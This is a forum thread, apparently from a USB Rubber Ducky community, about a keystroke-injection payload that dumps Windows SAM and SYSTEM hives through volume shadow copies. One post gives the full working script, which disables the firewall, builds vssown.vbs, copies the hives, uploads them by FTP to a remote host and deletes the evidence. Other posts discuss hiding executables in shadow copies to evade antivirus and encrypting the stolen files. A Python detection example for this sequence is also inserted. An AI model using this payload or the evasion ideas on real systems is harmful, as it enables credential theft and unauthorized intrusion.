Xcellerator Posted February 2, 2012 Hi guys, I read this article here, and thought that it'd work great as a Ducky payload. I originally wrote it for my Teensy board (I don't have a USBRD) but then rewrote it for the Ducky. I admit it's not the cleanest code in the world (the Teensy version), but it works. The delays are just a guide to work with MOST machines, but on a faster machine (a server for example, :o ), I'm sure you could reduce them greatly. Here is the link to the code on the USBRD Wiki: LINK, and there is also a link to the pastebin with the Teensy version as well in the description. Let me know what you think!
PCFreak Posted February 10, 2012 ... Let me know what you think! Nice! The VSSOwn script makes me think a lot... :D
Xcellerator (Author) Posted February 10, 2012 Yeah, I saw a demonstration of it and thought that it'd work brilliantly as a payload...
PCFreak Posted February 10, 2012 Yeah, I saw a demonstration of it and thought that it'd work brilliantly as a payload... I played a little bit with it. For Rubber Ducky payloads it doesn't make that much sense, since we do everything by keyboard, and if we create an evil executable on the target system just by keyboard inputs we do not need to hide it, we want to execute it right now! It might be interesting if you want to place the executable on the target system and then run it via a scheduled task that you also set up with the Ducky. I am thinking about the following:
1. Create the executable via base64 encoding through VBScript in the windows\system32 folder
2. Place vssown.vbs on the target system
3. Create a shadow copy
4. Delete your executable
5. Set up a scheduled task that calls vssown.vbs /execute \Windows\system32\evil.exe
The only advantage of this procedure would be that evil.exe is not visible to nearly 99% of users, since no one would mount a Shadow Copy. My opinion: good idea but not so practical for the Ducky. Maybe if we could access the Ducky's flash somehow it might be interesting in the future. Cheers Peter
Xcellerator (Author) Posted February 10, 2012 That's an interesting idea, and I would be very interested in incorporating that idea into a Metasploit module. One of the most difficult things about binary dropping from Metasploit is AVs picking them up, and leaving tracks on the target. Although they can be removed upon successful exploitation, any errors can be fatal. Also, has anyone checked to see if AVs do pick up on executables stored in a shadow copy? I'd be very surprised if they can...
teknic Posted March 7, 2012 Has anyone actually gotten this script to work? I've been trying it on my Win7 box, but have had no luck. Edited March 7, 2012 by teknic
PCFreak Posted March 8, 2012 Has anyone actually gotten this script to work? I've been trying it on my Win7 box, but have had no luck. What script do you mean? The vssown.vbs? It should work on a Win7 box without any problems (administrative shell required). Cheers PCFreak
Xcellerator (Author) Posted March 8, 2012 I tested the script (for the Teensy++ 2.0) on a Windows 7 box.
VirtualGEEK Posted March 8, 2012 I had problems with it...
1) There are a couple of typos in the USBRD script:
"STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM ."
"STRING copy \\?\GLoBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM ."
2) My test box didn't have a "HarddiskVolumeShadowCopy1", so the script would fail, delete the .vbs files and exit without displaying the error. I commented out the lines to exit and delete the vbs files and ran vssown.vbs /list to see if "1" existed, and it did not. Every time the /create line runs it would increment (11, 12, 13), so I edited the payload to change "1" to the next expected shadow copy # and then it finally copied the files. Perhaps the payload should use /list to determine the next shadow created, or try the next 25 #s if "HarddiskVolumeShadowCopy1" fails?
--nick-- Posted October 3, 2012 I could really use your guys' help on this
skysploit Posted May 9, 2013 Here's the VSSown payload rebuilt... Instead of downloading VSSOwn, this payload builds a modified version of the vbs file (only the needed parts). It runs the "/create c" five times. The reason for this is that each operating system typically already has 2-3 shadow copies and we want a new shadow copy with the current hashes. In addition to pulling the SAM & SYSTEM files, this payload drops the firewall and sends the files to a remote FTP server. Sending these files via FTP (in the clear) on a pentest will likely get you sued; this is just an example of how to extract the data... This payload runs on Windows 7 w/UAC enabled. This payload will be added to the simple-ducky in the next update.

DELAY 2000
ESCAPE
DELAY 600
CONTROL ESCAPE
DELAY 600
STRING cmd
DELAY 600
MENU
DELAY 600
STRING a
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 800
STRING cd %USERPROFILE%
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING copy con vssown.vbs
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING strComputer = "."
ENTER
STRING Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
ENTER
STRING Select Case args.Item(0)
ENTER
STRING Case "/start"
ENTER
STRING Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING For Each objService in colListOfServices
ENTER
STRING objService.StartService()
ENTER
STRING Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
ENTER
STRING Next
ENTER
STRING wscript.Quit(0)
ENTER
STRING Case "/stop"
ENTER
STRING Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING For Each objService in colListOfServices
ENTER
STRING objService.StopService()
ENTER
STRING Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
ENTER
STRING Next
ENTER
STRING wscript.Quit(0)
ENTER
STRING Case "/create"
ENTER
STRING VOLUME = args.Item(1) & ":\"
ENTER
STRING Const CONTEXT = "ClientAccessible"
ENTER
STRING Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
ENTER
STRING Wscript.Echo "[*] Attempting to create a shadow copy."
ENTER
STRING errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
ENTER
STRING wscript.Quit(errResult)
ENTER
STRING End Select
ENTER
CTRL z
ENTER
STRING cscript vssown.vbs /start
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM .
ENTER
DELAY 1000
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM .
ENTER
DELAY 1000
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING ftp
ENTER
DELAY 500
STRING open 192.168.10.109
ENTER
DELAY 800
STRING hacker
ENTER
DELAY 1000
STRING hacker
ENTER
DELAY 1000
STRING bin
ENTER
DELAY 800
STRING put SAM
ENTER
DELAY 800
STRING put SYSTEM
ENTER
DELAY 800
STRING quit
ENTER
DELAY 200
STRING DEL SAM
ENTER
STRING DEL SYSTEM
ENTER
STRING DEL vssown.vbs
ENTER
STRING exit
ENTER

~skysploit
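The payload above leaves a very recognisable trail in process-creation logs: the firewall is switched off, the VSS service is started by a script, a shadow copy is created, SAM and SYSTEM are read through a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path, and an FTP client is launched, all within seconds on the same host. The Python below is an added defensive example that is not part of skysploit's post or of the simple-ducky project. It scores those indicators per host inside a short time window so that the full sequence alerts while a lone backup-style shadow copy does not. The log format (timestamp|host|user|command line) and every sample line are constructed for this example rather than taken from any real Sysmon or EDR feed.

```python
"""Detect the shadow-copy credential-dump sequence in process-creation logs.

Added example written from the defender's side; it is not part of the forum
thread or of the simple-ducky project. The log format (timestamp|host|user|
command line) and all sample lines below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation log. WS01 mirrors the payload sequence
# discussed in the thread; WS02 is ordinary backup activity that also uses a
# shadow copy and must NOT alert.
SAMPLE_LOG = r"""
2013-05-09T10:00:01|WS01|alice|netsh firewall set opmode disable
2013-05-09T10:00:02|WS01|alice|cscript vssown.vbs /start
2013-05-09T10:00:03|WS01|alice|cscript vssown.vbs /create c
2013-05-09T10:00:05|WS01|alice|cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM .
2013-05-09T10:00:06|WS01|alice|cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM .
2013-05-09T10:00:07|WS01|alice|cscript vssown.vbs /stop
2013-05-09T10:00:08|WS01|alice|ftp
2013-05-09T11:30:00|WS02|backupsvc|vssadmin create shadow /for=C:
2013-05-09T11:30:05|WS02|backupsvc|robocopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Users D:\backup /MIR
"""

# (name, pattern, weight). A registry hive read through a shadow copy device
# path is weighted to alert on its own; the other indicators add confidence.
INDICATORS = [
    ("shadow_copy_created",
     re.compile(r"vssown\.vbs\s+/create|vssadmin\s+create\s+shadow|shadowcopy\s+call\s+create", re.I), 2),
    ("hive_read_via_shadow_copy",
     re.compile(r"GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\.*\\config\\(SAM|SYSTEM|SECURITY)\b", re.I), 5),
    ("firewall_disabled",
     re.compile(r"netsh\s+(firewall\s+set\s+opmode\s+disable|advfirewall\s+set\s+\w+\s+state\s+off)", re.I), 2),
    ("vss_service_toggled_by_script",
     re.compile(r"vssown\.vbs\s+/(start|stop)", re.I), 1),
    ("ftp_client_launched",
     re.compile(r"(^|\\)ftp(\.exe)?(\s|$)", re.I), 1),
]
ALERT_THRESHOLD = 5            # score at which a host/window becomes an alert
WINDOW = timedelta(minutes=10)  # how long related hits are grouped together


def parse_line(line):
    """Split one constructed log record into (timestamp, host, user, command)."""
    ts, host, user, cmd = line.split("|", 3)
    return datetime.fromisoformat(ts), host, user, cmd


def match_indicators(cmd):
    """Return [(indicator_name, weight)] for every indicator the command matches."""
    return [(name, weight) for name, rx, weight in INDICATORS if rx.search(cmd)]


def detect(log_text):
    """Score indicator hits per host inside a time window and return alerts.

    The window opens at a host's first hit and closes WINDOW later. A single
    backup-style shadow copy scores 2 and stays below ALERT_THRESHOLD; the
    full dump sequence from the thread scores well above it.
    """
    hits_by_host = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmd = parse_line(line)
        for name, weight in match_indicators(cmd):
            hits_by_host[host].append((ts, user, name, weight))

    alerts = []
    for host, hits in hits_by_host.items():
        hits.sort(key=lambda h: h[0])
        i = 0
        while i < len(hits):
            start = hits[i][0]
            window = [h for h in hits[i:] if h[0] - start <= WINDOW]
            score = sum(w for _, _, _, w in window)
            if score >= ALERT_THRESHOLD:
                alerts.append({
                    "host": host,
                    "user": window[0][1],
                    "start": start.isoformat(),
                    "score": score,
                    "indicators": sorted({n for _, _, n, _ in window}),
                })
            i += len(window)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The hive-path pattern is the one worth keeping even if the rest is dropped: legitimate backup tools read files through shadow copy device paths all the time, but almost nothing legitimate copies \config\SAM or \config\SYSTEM out of one, so that indicator alone clears the threshold. The weights and window are assumptions chosen for this example, not tuned values from any product.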
Xcellerator (Author) Posted May 19, 2013 Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network! Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a TrueCrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..! Edited May 19, 2013 by Xcellerator
skysploit Posted May 20, 2013 Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network! Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a TrueCrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..! Download the latest version of the simple-ducky (v1.1.0): https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.0_debian.sh&can=2&q= It has a modified version of this payload which uses 7za to AES256-encrypt the extracted files prior to sending them over FTP. It also has a built-in hasher and custom wordlist builder. So say if you are pentesting company X, you can download their website and generate a password list based on every word extracted. You are then prompted with the option to merge the new list with the default list in John. ~skysploit